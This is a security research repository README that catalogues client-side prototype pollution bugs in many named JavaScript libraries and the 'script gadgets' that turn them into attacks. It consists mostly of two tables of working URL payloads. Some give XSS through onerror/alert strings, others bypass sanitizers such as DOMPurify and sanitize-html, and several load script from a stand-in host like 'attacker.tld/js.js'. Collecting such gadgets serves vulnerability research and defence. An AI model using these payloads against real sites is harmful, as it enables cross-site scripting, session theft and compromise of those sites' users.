incogbyte/client-side-prototype-pollution

Prototype Pollution and useful Script Gadgets

Client-Side Prototype Pollution

Intro

If you are unfamiliar with Prototype Pollution Attack, you should read the following first:
JavaScript prototype pollution attack in NodeJS by Olivier Arteau
Prototype pollution – and bypassing client-side HTML sanitizers by Michał Bentkowski

In this repository, I am trying to collect examples of libraries that are vulnerable to Prototype Pollution due to document.location parsing and useful script gadgets that can be used to demonstrate the impact.

Prototype Pollution

Name	Payload	Refs	Found by
Wistia Embedded Video (Fixed)	?__proto__[test]=test ?__proto__.test=test	[1]	William Bowling
jQuery query-object plugin CVE-2021-20083	?__proto__[test]=test #__proto__[test]=test		Sergey Bobrov
jQuery Sparkle CVE-2021-20084	?__proto__.test=test ?constructor.prototype.test=test		Sergey Bobrov
V4Fire Core Library	?__proto__.test=test ?__proto__[test]=test ?__proto__[test]={"json":"value"}		Sergey Bobrov
backbone-query-parameters CVE-2021-20085	?__proto__.test=test ?constructor.prototype.test=test ?__proto__.array=1|2|3	[1]	Sergey Bobrov
jQuery BBQ CVE-2021-20086	?__proto__[test]=test ?constructor[prototype][test]=test		Sergey Bobrov
jquery-deparam CVE-2021-20087	?__proto__[test]=test ?constructor[prototype][test]=test		Sergey Bobrov
MooTools More CVE-2021-20088	?__proto__[test]=test ?constructor[prototype][test]=test		Sergey Bobrov
Swiftype Site Search (Fixed)	#__proto__[test]=test	[1]	s1r1us
CanJS deparam	?__proto__[test]=test ?constructor[prototype][test]=test		Rahul Maini
Purl (jQuery-URL-Parser) CVE-2021-20089	?__proto__[test]=test ?constructor[prototype][test]=test #__proto__[test]=test		Sergey Bobrov
HubSpot Tracking Code (Fixed)	?__proto__[test]=test ?constructor[prototype][test]=test #__proto__[test]=test		Sergey Bobrov
YUI 3 querystring-parse	?constructor[prototype][test]=test		Sergey Bobrov
Mutiny (Fixed)	?__proto__.test=test		SPQR
jQuery parseParams	?__proto__.test=test ?constructor.prototype.test=test		POSIX
php.js parse_str	?__proto__[test]=test ?constructor[prototype][test]=test		POSIX
arg.js	?__proto__[test]=test ?__proto__.test=test ?constructor[prototype][test]=test #__proto__[test]=test		POSIX
davis.js	?__proto__[test]=test		POSIX
Component querystring	?__proto__[NUMBER]=test ?__proto__[123]=test		Masato Kinugawa
Aurelia path	?__proto__[test]=test	[1]	s1r1us
analytics-utils < 1.0.3	?__proto__[test]=test ?constructor[prototype][test]=test	[1]	alexdaviestray

Script Gadgets

Name	Payload	Impact	Refs	Found by
Wistia Embedded Video	?__proto__[innerHTML]=<img/src/onerror%3dalert(1)>	XSS	[1]	William Bowling
jQuery $.get	?__proto__[context]=<img/src/onerror%3dalert(1)> &__proto__[jquery]=x	XSS		Sergey Bobrov
jQuery $.get >= 3.0.0 Boolean.prototype	?__proto__[url][]=data:,alert(1)// &__proto__[dataType]=script	XSS		Michał Bentkowski
jQuery $.get >= 3.0.0 Boolean.prototype	?__proto__[url]=data:,alert(1)// &__proto__[dataType]=script &__proto__[crossDomain]=	XSS		Sergey Bobrov
jQuery $.getScript >= 3.4.0	?__proto__[src][]=data:,alert(1)//	XSS		s1r1us
jQuery $.getScript 3.0.0 - 3.3.1 Boolean.prototype	?__proto__[url]=data:,alert(1)//	XSS		s1r1us
jQuery $(html)	?__proto__[div][0]=1 &__proto__[div][1]=<img/src/onerror%3dalert(1)>	XSS		Sergey Bobrov
jQuery $(x).off String.prototype	?__proto__[preventDefault]=x &__proto__[handleObj]=x &__proto__[delegateTarget]=<img/src/onerror%3dalert(1)>	XSS		Sergey Bobrov
Google reCAPTCHA	?__proto__[srcdoc][]=<script>alert(1)</script>	XSS		s1r1us
Twitter Universal Website Tag	?__proto__[hif][]=javascript:alert(1)	XSS		Sergey Bobrov
Tealium Universal Tag	?__proto__[attrs][src]=1 &__proto__[src]=data:,alert(1)//	XSS		Sergey Bobrov
Akamai Boomerang	?__proto__[BOOMR]=1 &__proto__[url]=//attacker.tld/js.js	XSS		s1r1us
Lodash <= 4.17.15	?__proto__[sourceURL]=%E2%80%A8%E2%80%A9alert(1)	XSS	[1]	Alex Brasetvik
sanitize-html	?__proto__[*][]=onload	Bypass	[1]	Michał Bentkowski
sanitize-html	?__proto__[innerText]=<script>alert(1)</script>	Bypass	[1]	Hpdoger
js-xss	?__proto__[whiteList][img][0]=onerror &__proto__[whiteList][img][1]=src	Bypass	[1]	Michał Bentkowski
DOMPurify <= 2.0.12	?__proto__[ALLOWED_ATTR][0]=onerror &__proto__[ALLOWED_ATTR][1]=src	Bypass	[1]	Michał Bentkowski
DOMPurify <= 2.0.12	?__proto__[documentMode]=9	Bypass	[1]	Michał Bentkowski
Google Closure	?__proto__[*%20ONERROR]=1 &__proto__[*%20SRC]=1	Bypass	[1]	Michał Bentkowski
Google Closure	?__proto__[CLOSURE_BASE_PATH]=data:,alert(1)//	XSS	[1]	Michał Bentkowski
Marionette.js / Backbone.js	?__proto__[tagName]=img &__proto__[src][]=x: &__proto__[onerror][]=alert(1)	XSS		Sergey Bobrov
Adobe Dynamic Tag Management	?__proto__[src]=data:,alert(1)//	XSS		Sergey Bobrov
Adobe Dynamic Tag Management	?__proto__[SRC]=<img/src/onerror%3dalert(1)>	XSS		Sergey Bobrov
Swiftype Site Search	?__proto__[xxx]=alert(1)	XSS		s1r1us
Embedly Cards	?__proto__[onload]=alert(1)	XSS		Guilherme Keerok
Segment Analytics.js	?__proto__[script][0]=1 &__proto__[script][1]=<img/src/onerror%3dalert(1)>	XSS		Sergey Bobrov
Knockout.js Array.prototype	?__proto__[4]=a':1,[alert(1)]:1,'b &__proto__[5]=,	XSS		Michał Bentkowski
Zepto.js	?__proto__[onerror]=alert(1)	XSS	[1]	lih3iu
Zepto.js	?__proto__[html]=<img/src/onerror%3dalert(1)>	XSS		Sergey Bobrov
Sprint.js	?__proto__[div][intro]=<img%20src%20onerror%3dalert(1)>	XSS	[1]	lih3iu
Vue.js	?__proto__[v-if]=_c.constructor('alert(1)')()	XSS		POSIX
Vue.js	?__proto__[attrs][0][name]=src &__proto__[attrs][0][value]=xxx &__proto__[xxx]=data:,alert(1)// &__proto__[is]=script	XSS	[1]	s1r1us
Vue.js	?__proto__[v-bind:class]=''.constructor.constructor('alert(1)')()	XSS	[1]	r00timentary
Vue.js	?__proto__[data]=a &__proto__[template][nodeType]=a &__proto__[template][innerHTML]=<script>alert(1)</script>	XSS	[1]	SuperGuesser
Vue.js	?__proto__[props][][value]=a &__proto__[name]=":''.constructor.constructor('alert(1)')(),"	XSS	[1]	st98_
Vue.js	?__proto__[template]=<script>alert(1)</script>	XSS	[1]	huli
Demandbase Tag	?__proto__[Config][SiteOptimization][enabled]=1 &__proto__[Config][SiteOptimization][recommendationApiURL]=//attacker.tld/json_cors.php?	XSS		SPQR
@analytics/google-tag-manager	?__proto__[customScriptSrc]=//attacker.tld/xss.js	XSS		SPQR
i18next	?__proto__[lng]=cimode &__proto__[appendNamespaceToCIMode]=x &__proto__[nsSeparator]=<img/src/onerror%3dalert(1)>	Potential XSS		Sergey Bobrov
i18next < 19.8.5	?__proto__[lng]=a &__proto__[a]=b &__proto__[obj]=c &__proto__[k]=d &__proto__[d]=<img/src/onerror%3dalert(1)>	Potential XSS		Sergey Bobrov
i18next >= 19.8.5	?__proto__[lng]=a &__proto__[key]=<img/src/onerror%3dalert(1)>	Potential XSS		Sergey Bobrov
Google Analytics	?__proto__[cookieName]=COOKIE%3DInjection%3B	Cookie Injection		Sergey Bobrov
Popper.js	?__proto__[arrow][style]=color:red;transition:all%201s &__proto__[arrow][ontransitionend]=alert(1) ?__proto__[reference][style]=color:red;transition:all%201s &__proto__[reference][ontransitionend]=alert(2) ?__proto__[popper][style]=color:red;transition:all%201s &__proto__[popper][ontransitionend]=alert(3)	XSS	[1] [2]	Matheus Vrech
Pendo Agent	?__proto__[dataHost]=attacker.tld/js.js%23	XSS		Renwa
script.aculo.us String.constructor	?x=x &x[constructor][__parseStyleElement][innerHTML]=<img/src/onerror%3dalert(1)>	XSS		Sergey Bobrov
hCaptcha (Fixed)	?__proto__[assethost]=javascript:alert(1)//	XSS		Masato Kinugawa
Google Closure	?__proto__[trustedTypes]=x &__proto__[emptyHTML]=<img/src/onerror%3dalert(1)>	XSS		Mathias Karlsson
Google Tag Manager	?__proto__[vtp_enableRecaptcha]=1 &__proto__[srcdoc]=<script>alert(1)</script>	XSS		terjanq
Google Tag Manager	?__proto__[q][0][0]=require &__proto__[q][0][1]=x &__proto__[q][0][2]=https://www.google-analytics.com/gtm/js%3Fid%3DGTM-WXTDWH7	XSS		Sergey Bobrov / Masato Kinugawa
Google Analytics	?__proto__[q][0][0]=require &__proto__[q][0][1]=x &__proto__[q][0][2]=https://www.google-analytics.com/gtm/js%3Fid%3DGTM-WXTDWH7	XSS		Sergey Bobrov / Masato Kinugawa